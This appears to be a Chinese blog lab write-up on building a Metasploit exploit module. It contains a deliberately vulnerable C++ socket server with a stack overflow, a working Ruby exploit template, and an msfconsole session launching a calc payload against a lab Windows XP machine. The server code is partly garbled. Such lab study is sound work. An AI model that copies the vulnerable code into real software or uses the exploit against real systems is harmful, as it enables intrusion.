-
4.2 metasploit 开发 exploit
目录
一、实验清单
实验清单 类型 序号 软硬件要求 规格 攻击机 1 数量 1台 2 操作系统版本 kali 3 软件版本 metasploit 靶机 1 数量 1台 2 操作系统版本 windows xp sp3 3 软件版本 vc++ 二、实验思路
靶机:采用一个存在典型栈溢出的server,其代码如下:
- #include
- #include
- #pragma comment(lib,"ws2_32.lib")
- void msg_display(char *buf)
- {
- char msg[200];
- strcpy(msg,buf); //overflow here,copy 0x200 to200
- cout<<"***************"<cout<<"received:"<cout<}void main(){int sock,msgsock,lenth,receive_len;struct sockaddr_in sock_server,sock_client;char buf[0x200];//notice it is 0x200WSADATA wsa;WSAStartup(MAKEWORD(1,1),&wsa);if((sock=socket(AF_INET,SOCK_STREAM,0))<0){cout<exit(1);}sock_server.sin_family=AF_INET;sock_server.sin_port=htons(7777);sock_server.sin_addr.s_addr=htonl(INADDR_ANY);if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server))){cout<<"binging stream socket error!"<}cout<<"****************************"<cout<<"exploit target server 1.0 "<cout<<"****************************"<listen(sock,4);lenth=sizeof(struct sockaddr);do{msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);if(msgsock==-1){cout<<"accept error"<break;}elsedo{memset(buf,0,sizeof(buf));if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0){cout<<"reading stream message error!"<receive_len=0;}msg_display(buf); //trigged the overflow}while(receive_len);closesocket(msgsock);}while(1);WSACleanup();}
程序大致思路:在vc++中编译运行后,程序会在7777端口监听TCP连接,如果收到数据,就在屏幕上打印出来。在main函数中,buf数组的大小被声明为0x200,在mag_display函数中,将大小为0x200的字符串复制进200大小的局部数组,从而引发一个典型的栈溢出。
攻击机:使用Ruby语言开发一个exploit模板,并在MSF上运行以测试漏洞。Ruby脚本如下:
- #!/usr/bin/env ruby
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- include Exploit::Remote::TCP
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'failwest_test',
- 'Platform' => 'win',
- 'Target' => [
- ['Windows 2000',{'Ret' => 0x77F8948B}],
- ['WIndows XP SP3',{'Ret' => 0x77D928A3}]
- ],
- 'Payload' => {
- 'Space' => 2000,
- 'BadChars' => "\x00",
- }
- ))
- end #end of initialize
- def exploit
- connect
- attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
- sock.put(attack_buf)
- handler
- disconnect
- end #end of exploit def
- end #end of class def
对上述代码进行简单解释:
(1)require指明所需的类库,相当于C语言的include;
(2)运算符“<”表示继承,也就是,我们这里所定义的类是由Msf::Exploit::Remote继承而来;
(3)在类中,定义了两个方法(函数),一个是initialize,另一个是exploit。现在模板的框架可以看成:
- class xxx
- def initialize
- #定义模块初始化信息,如漏洞适用的操作系统平台、为不同操作系统指明不同的返回地址
- #指明shellcode中禁止出现的特殊字符、漏洞相关描述、URL引用、作者信息等
- end
- def exploit
- #将填充物、返回地址、shellcode等组织成最终的attack_buf,并发送
- end
- end
从实验所用的Ruby脚本看initialize:
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'failwest_test',
- 'Platform' => 'win',
- 'Target' => [
- ['Windows 2000',{'Ret' => 0x77F8948B}],
- ['WIndows XP SP3',{'Ret' => 0x77D928A3}]
- ],
- 'Payload' => {
- 'Space' => 2000,
- 'BadChars' => "\x00",
- }
- ))
- end #end of initialize
(1)Name模块的名称,在msf console中,使用“show exploit”命令,会显示每一个exploit的序号、路径...以及此时这个Name;
(2)Platform模块运行平台,MSF通过这个值来为exploit挑选payload。本例中,该值为‘win’,在挑选payload时,MSF只会选择windows平台的payload,而BSD、linux的payload将会被禁用。
(3)Targets可以定义多种操作系统的返回地址。可以用ollydbg或者msf有个模块可以获取跳转指令的返回地址。
(4)Payload则是对shellcode的要求,如大小和禁止用的字节等。
再看exploit:
- def exploit
- connect
- attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
- sock.put(attack_buf)
- handler
- disconnect
- end #end of exploit def
对于attack_buf:
attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded(1)用200个字符“a”填充缓冲区;
(2)pack('V')的作用是把数据按照DWORD逆序
(3)payload.excoded是将payload编码。
三、实验步骤
1、在靶机上编译并运行漏洞程序;
2、在攻击机上编写Ruby脚本,保存为“test_exploit.rb”,存放路径为:
/var/usr/share/metasploit-framework/modules/exploits/failwest/3、启动msf console,并且输入以下命令;
- msf6 > use exploit/failwest/test_exploit
- [*] No payload configured, defaulting to generic/shell_reverse_tcp
- msf6 exploit(failwest/test_exploit) > show targets
- Exploit targets:
- Id Name
- -- ----
- 0 Automatic
- 1 Windows 2000
- 2 WIndows XP SP2
- msf6 exploit(failwest/test_exploit) > set target 2
- target => 2
- msf6 exploit(failwest/test_exploit) > show payloads
- Compatible Payloads
- ===================
- # Name Disclosure Date Rank Check Description
- - ---- --------------- ---- ----- -----------
- 0 payload/generic/custom normal No Custom Payload
- 1 payload/generic/debug_trap normal No Generic x86 Debug Trap
- 2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
- 3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
- 4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
- 5 payload/generic/tight_loop normal No Generic x86 Tight Loop
- 6 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
- 7 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
- 8 payload/windows/exec normal No Windows Execute Command
- 9 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
- 10 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
- 11 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
- 12 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
- 13 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
- 14 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
- 15 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
- 16 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
- 17 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
- 18 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
- 19 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
- 20 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
- 21 payload/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
- 22 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
- 23 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
- 24 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
- 25 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
- 26 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
- 27 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
- msf6 exploit(failwest/test_exploit) > set payload windows/exec
- payload => windows/exec
- msf6 exploit(failwest/test_exploit) > show options
- Module options (exploit/failwest/test_exploit):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOSTS yes The target host(s), see https://github.com/ra
- pid7/metasploit-framework/wiki/Using-Metasplo
- it
- RPORT yes The target port (TCP)
- Payload options (windows/exec):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- CMD yes The command string to execute
- EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
- process, none)
- Exploit target:
- Id Name
- -- ----
- 2 WIndows XP SP2
- msf6 exploit(failwest/test_exploit) > set rhost 192.168.92.132 //靶机IP
- rhost => 192.168.92.132
- msf6 exploit(failwest/test_exploit) > set rport 7777
- rport => 7777
- msf6 exploit(failwest/test_exploit) > set cmd calc
- cmd => calc
- msf6 exploit(failwest/test_exploit) > set exitfunc seh
- exitfunc => seh
- msf6 exploit(failwest/test_exploit) > exploit
4、回到靶机,可以看到如下界面:
唯一的不足就是:shellcode已经注入到靶机中了,但是没有运行。
为此,做了以下努力:
(1)使用telnet命令,连接到了靶机,并且也正常输出字符,说明漏洞程序没有问题;
(2)在msf中,使用generate命令,将payload为windows/exec的shellcode找出来,并且用加载程序在靶机上运行,结果是可以调出计算器,正常运行。
至此,具体为什么使用exploit注入的shellcode无法运行的原因不知,有待进一步研究。
- 相关阅读:
【 Maven 】花式玩法之多模块项目
拆解美图SaaS:开着飞机换引擎
Spring Bean 的生命周期
JAVA小游戏 “拼图”
再见 Typescript,你好 Javascript 原生打字 ✨
线性代数学习笔记11-3:总复习(习题)
短信验证码
西门子S7-1200F或1500F系列安全PLC的组态步骤和基础编程(二)
栈和队列基础
[附源码]java毕业设计社区新冠疫情防控网站
- 原文地址:https://blog.csdn.net/qq_55202378/article/details/126528055
